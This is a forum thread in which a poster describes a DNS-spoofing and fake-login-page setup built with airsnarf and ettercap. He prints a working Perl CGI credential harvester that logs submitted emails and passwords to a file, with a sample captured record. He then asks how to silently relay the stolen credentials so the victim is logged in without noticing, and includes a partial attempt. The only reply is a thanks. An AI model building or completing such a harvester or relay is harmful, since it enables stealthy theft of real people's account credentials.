Results 1 to 2 of 2

Thread: cgi script

  1. #1
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default cgi script

    Okay, So Ive setup air snarf in the lab, im using ettercap to Spoof the dns, I have modified a fake replica page where the login action invokes the cgi script below, the login, is saved and all works fine, my question is instead of serving up the said, cgi page with the example message "sorry our server is down for mantainence" how would we go about using the information from stdin, to refer and log the victim into their account whilst still recording the data to passwords.txt, so instead of the stealing the victims login, and printing a suspicious sorry our servers are down message, the victims logins should be stolen but the victim should also be signed into his account, none the wiser of what just happened,

    so a quick overview, the user presses login on the fake replica page, the cgi/html script is executed his info is stored to passwords.txt but he is also then logged in, without seeing any of this happen.


    CURRENT CGI SCRIPT

    #!perl
    # chmod +x this file and stick it in your cgi-bin directory

    # CHANGE THESE VARIABLES $page_title $page_message $page_image
    $page_title = "BUSY SERVERS";
    $page_message = "SORRY IT LOOKS LIKE OUR SERVERS ARE BUSY TRY LATER";
    $page_image = "SERVER.jpg";

    print "Content-type:text/html\n\n";

    read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
    @pairs = split(/&/, $buffer);
    foreach $pair (@pairs) {
    ($name, $value) = split(/=/, $pair);
    $value =~ tr/+/ /;
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    $FORM{$name} = $value;
    }
    $file = "/passwords.txt";
    open (MAIL, ">>$file") or dienice("Can't access $file!\n");
    print MAIL "\nurl = $ENV{'SERVER_NAME'}";
    foreach $key (keys(%FORM)) {
    print MAIL ", $key = $FORM{$key}";
    }
    close(MAIL);

    # return HTML message to user
    print "<html><head><title>$page_title</title></head><body>";
    print "<center>";
    print "<img src=\"/$page_image\"><br><br>";
    print "$page_message<br><br>\n";
    print "</body></html>";


    Here is an example of what password.txt looks like


    url = Backtrack Railway Services, form_charset = UTF-8, login_params = , login_cmd = , submit.x = Log In, login_email = Backtrack@hotmail.com, login_password = backtrack1, target_page = 0






    this is what the script needs to something like, excuse this pathetic attempt

    #!perl
    # chmod +x this file and stick it in your cgi-bin directory


    print "Content-type:text/html\n\n";

    read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
    @pairs = split(/&/, $buffer);
    foreach $pair (@pairs) {
    ($name, $value) = split(/=/, $pair);
    $value =~ tr/+/ /;
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    $FORM{$name} = $value;
    }
    $file = "/passwords.txt";
    open (MAIL, ">>$file") or dienice("Can't access $file!\n");
    print MAIL "\nurl = $ENV{'SERVER_NAME'}";
    foreach $key (keys(%FORM)) {
    print MAIL ", $key = $FORM{$key}";
    }
    close(MAIL);

    # return HTML message to user
    <html>
    <body>

    <form method="post" action="not for forum">


    <input type="hidden" name="page" value="$page">

    username: <input type="text" name="login_email" value="$key" size=10><br>
    password: <input type="password" name="login_password" value="$FORM" size=10><p>


    <input type="submit" value="Log In">

    </form>

    </body>
    </html>




    Thanks in advanced.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  2. #2
    Just burned his ISO
    Join Date
    Nov 2009
    Posts
    1

    Default

    thanx a lot man

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •